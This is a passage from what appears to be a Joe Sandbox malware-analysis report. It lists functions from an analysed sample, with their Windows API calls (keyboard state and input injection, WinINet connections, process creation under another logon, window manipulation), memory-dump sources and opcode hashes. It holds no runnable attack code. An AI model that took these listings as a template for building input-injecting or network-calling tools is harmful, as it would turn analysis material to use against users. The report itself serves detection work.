                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007BAF6C
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007BB23F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 780911581-0
                                                                                                                                        • Opcode ID: 351ff15c9b2f2c50ed34e85eaf50135047d336a5b27e881aef2071fceb3d9668
                                                                                                                                        • Instruction ID: 50e8c7be4001bd009d0b85ea1448f96093e1028a043f788dd043a00437d34f79
                                                                                                                                        • Opcode Fuzzy Hash: 351ff15c9b2f2c50ed34e85eaf50135047d336a5b27e881aef2071fceb3d9668
                                                                                                                                        • Instruction Fuzzy Hash: A7A15B75604701DFDB10EF18C895B6AB7E4BF88360F048559F99A9B3A1CB78ED44CB82
                                                                                                                                        Function 007842EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3877424927-0
                                                                                                                                        • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                        • Instruction ID: 1ea7d8899d8f8252cc8931a53d272e0935bea9eb71005b8794b04b0266a655a8
                                                                                                                                        • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                        • Instruction Fuzzy Hash: 5751C730A40347DBDB24AF79C88466E7BB5AF40320F248729F879A66D1D7F89D519B40
                                                                                                                                        Function 007CC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 007CC354
                                                                                                                                        • ScreenToClient.USER32(?,00000002), ref: 007CC384
                                                                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 007CC3EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                        • Opcode ID: a9efa7cc1d5b71d130d999c2fa681448938cdb3032ea6de7ba65a0363371af97
                                                                                                                                        • Instruction ID: 489ada3492f73efb362a660217d694822862be2026c724b39bfce432d9c3c020
                                                                                                                                        • Opcode Fuzzy Hash: a9efa7cc1d5b71d130d999c2fa681448938cdb3032ea6de7ba65a0363371af97
                                                                                                                                        • Instruction Fuzzy Hash: C4516C31A00244EFCF25DF68D8C4EAE7BB6BB49360F20C15DE9199B290D734AE41CB91
                                                                                                                                        Function 0079D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0079D258
                                                                                                                                        • __itow.LIBCMT ref: 0079D292
                                                                                                                                          • Part of subcall function 0079D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0079D549
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0079D2FB
                                                                                                                                        • __itow.LIBCMT ref: 0079D350
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3379773720-0
                                                                                                                                        • Opcode ID: 84e77ca885831206d03bd29f1b22cc87f76265f177fb1939fc106963d22aa469
                                                                                                                                        • Instruction ID: 8b51b8668285d2b842fdeca954e39de5bf35e989a785ecfe8e510c8d49d9cb00
                                                                                                                                        • Opcode Fuzzy Hash: 84e77ca885831206d03bd29f1b22cc87f76265f177fb1939fc106963d22aa469
                                                                                                                                        • Instruction Fuzzy Hash: 7C41B871A00309EFDF25EF54D856BEE7BB9AF49710F000015FA06A7291DB789E45CB51
                                                                                                                                        Function 007AEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007AEF32
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 007AEF58
                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007AEF7D
                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007AEFA9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                        • Opcode ID: 96fc15dba013367f147552279efa0b30f223ec408d5f98a313790c3f6fee0585
                                                                                                                                        • Instruction ID: d9a7520353820d78ab8e52cc4ac6c36a6ccf6137e51696e5aee4cdc015f33736
                                                                                                                                        • Opcode Fuzzy Hash: 96fc15dba013367f147552279efa0b30f223ec408d5f98a313790c3f6fee0585
                                                                                                                                        • Instruction Fuzzy Hash: E4415F35600651DFCB11EF19C588A59BBE5EF89320B19C488ED4AAF762CB38FD41CB91
                                                                                                                                        Function 007CB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007CB3E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                        • Opcode ID: 7b5eeb4d7a18162442920f57d827773368723834695b340213f9f520ac5204ca
                                                                                                                                        • Instruction ID: 9f72ff5fb2e5218d4983c5e749d9a807bb8f4045fbaca0f531f493be474909bd
                                                                                                                                        • Opcode Fuzzy Hash: 7b5eeb4d7a18162442920f57d827773368723834695b340213f9f520ac5204ca
                                                                                                                                        • Instruction Fuzzy Hash: 3131E434604284FBEF389F58DC8BFA83765EB0A350F20811EFA51DA1A2C739DA419B51
                                                                                                                                        Function 007CD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CD617
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 007CD68D
                                                                                                                                        • PtInRect.USER32(?,?,007CEB2C), ref: 007CD69D
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 007CD70E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                        • Opcode ID: 55d3b6c8c6b836e2bb1830ad17da1f324c79c7f19351f3db35b2d0c80cb307c7
                                                                                                                                        • Instruction ID: fe79399b9ebffb33ece54b2db2f714237e329762ceb0e5de1b3b04d92587f808
                                                                                                                                        • Opcode Fuzzy Hash: 55d3b6c8c6b836e2bb1830ad17da1f324c79c7f19351f3db35b2d0c80cb307c7
                                                                                                                                        • Instruction Fuzzy Hash: 34415A34A00118EFCB21DF58D884FA97BF5BB49350F2481BEE409AB251D738EC42DB50
                                                                                                                                        Function 007A4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 007A44EE
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 007A450A
                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 007A456A
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 007A45C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 139b7f27e4bfe7690be09b82d23e2a6b6a122bb1485c89fc79cff0e97d525ab5
                                                                                                                                        • Instruction ID: 0590fe9695013a8022f38ac2271e26d33a7928bc460eb400a3214739aa9ba02e
                                                                                                                                        • Opcode Fuzzy Hash: 139b7f27e4bfe7690be09b82d23e2a6b6a122bb1485c89fc79cff0e97d525ab5
                                                                                                                                        • Instruction Fuzzy Hash: C9310671D00298AFEF348B6488187BE7BA5ABCB310F04035AF081571C1C7BE9E64DB62
                                                                                                                                        Function 00794DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00794DE8
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00794E16
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00794E44
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00794E7A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: 0a41814eb24067c8f57837887c1ccd659dddb37ab41868bc01a75cc1c36fe970
                                                                                                                                        • Instruction ID: 3440318cdbc300e871f5862a3dd66a82cf667f8225d246733d066b03f1fa2be3
                                                                                                                                        • Opcode Fuzzy Hash: 0a41814eb24067c8f57837887c1ccd659dddb37ab41868bc01a75cc1c36fe970
                                                                                                                                        • Instruction Fuzzy Hash: B631AB31600246AFDF219F74DC49FBA7BAABF41310F158528E8218B1A0E738EC52DB90
                                                                                                                                        Function 007C7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32 ref: 007C7AB6
                                                                                                                                          • Part of subcall function 007A69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 007A69E3
                                                                                                                                          • Part of subcall function 007A69C9: GetCurrentThreadId.KERNEL32 ref: 007A69EA
                                                                                                                                          • Part of subcall function 007A69C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 007A69F1
                                                                                                                                        • GetCaretPos.USER32(?), ref: 007C7AC7
                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 007C7B00
                                                                                                                                        • GetForegroundWindow.USER32 ref: 007C7B06
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                        • Opcode ID: 785b4984ce2300396e5da91660ac1f704200c574c8f80c4c7481c7c6b6369a8f
                                                                                                                                        • Instruction ID: d6939d5e222f2c7dc817d12b94e0384974bc6823cdebe737c732218decf9c6b6
                                                                                                                                        • Opcode Fuzzy Hash: 785b4984ce2300396e5da91660ac1f704200c574c8f80c4c7481c7c6b6369a8f
                                                                                                                                        • Instruction Fuzzy Hash: 6331FE71D00108AFCB10EFB5DC859EFBBF9EF59354B10806AE815E7211DA39AE05CBA0
                                                                                                                                        Function 007B497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B49B7
                                                                                                                                          • Part of subcall function 007B4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B4A60
                                                                                                                                          • Part of subcall function 007B4A41: InternetCloseHandle.WININET(00000000), ref: 007B4AFD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1463438336-0
                                                                                                                                        • Opcode ID: 7a66d404c46d1c8cecac965444c43152adfa37ef60a32af8bcd6f97ebd2214b4
                                                                                                                                        • Instruction ID: a89fd6eaba95e0c88ae483be80f8d9b0b7fcfd4e09bac00e81b799458026fea9
                                                                                                                                        • Opcode Fuzzy Hash: 7a66d404c46d1c8cecac965444c43152adfa37ef60a32af8bcd6f97ebd2214b4
                                                                                                                                        • Instruction Fuzzy Hash: 8121F332240A05BFDB119F60CC04FFBBBA9FF48701F14801AFA059A651EB79E810AB94
                                                                                                                                        Function 0079BC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0079BCD9
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0079BCE0
                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 0079BCFA
                                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079BD29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2621361867-0
                                                                                                                                        • Opcode ID: 055537b71457cb0eccf3e774cc9fdd83f67442c0522defb79fd4c09d44d93f28
                                                                                                                                        • Instruction ID: 95574616a8cfd1c8365b8b903b6ba5c832000c2fd7a138289530baa85ae127a8
                                                                                                                                        • Opcode Fuzzy Hash: 055537b71457cb0eccf3e774cc9fdd83f67442c0522defb79fd4c09d44d93f28
                                                                                                                                        • Instruction Fuzzy Hash: FD216F7210124DEBDF119F98FE49BDE7BA9EF09314F048014FA01A6160C77ADE61DB60
                                                                                                                                        Function 007C8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 007C88A3
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C88BD
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C88CB
                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007C88D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                        • Opcode ID: e712b2caaa224048f1fb56b8078f7fc303ac061f151b344cffc050ed4a8d3f94
                                                                                                                                        • Instruction ID: 3059955ff29405710815ba393d79b53357f1fc8007f5fb64fe73423d61b19ebd
                                                                                                                                        • Opcode Fuzzy Hash: e712b2caaa224048f1fb56b8078f7fc303ac061f151b344cffc050ed4a8d3f94
